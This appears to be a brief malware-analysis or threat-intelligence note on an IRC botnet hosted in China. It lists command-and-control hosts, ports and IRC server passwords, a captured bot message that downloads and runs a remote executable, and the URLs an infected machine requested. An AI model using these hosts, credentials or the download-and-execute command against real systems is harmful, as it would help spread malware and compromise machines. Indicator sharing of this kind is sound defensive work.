ngme.drwhox.com (IRC botnet hosted in China, Hebei, Chinanet Hebei Province Network)

Remote Host Port Number
ngme.drwhox.com:5101
Possible DNS:
ngme.yourwebfind.com
123.183.217.32 5101 PASS hax0r (ircd here)
213.251.170.52 80
31.184.237.43 80
60.190.223.125 6943 PASS laorosr (ircd here)

PRIVMSG #on :[d=”http://31.184.237.43/0481.exe” s=”60779 bytes”] Executed file “C:\Documents and Settings\UserName\Application Data\1.tmp” – Download retries: 0
MODE [N00_USA_XP_1567294]
@ -ix

* The data identified by the following URLs was then requested from the remote web server:
o http://api.wipmania.com/
o http://31.184.237.43/0481.exe
o http://ppppnipponp.r7m.us/cgi-bin/p.cgi
o http://31.184.237.43/201.exe

Chinese hosting:
http://whois.domaintools.com/123.183.217.32
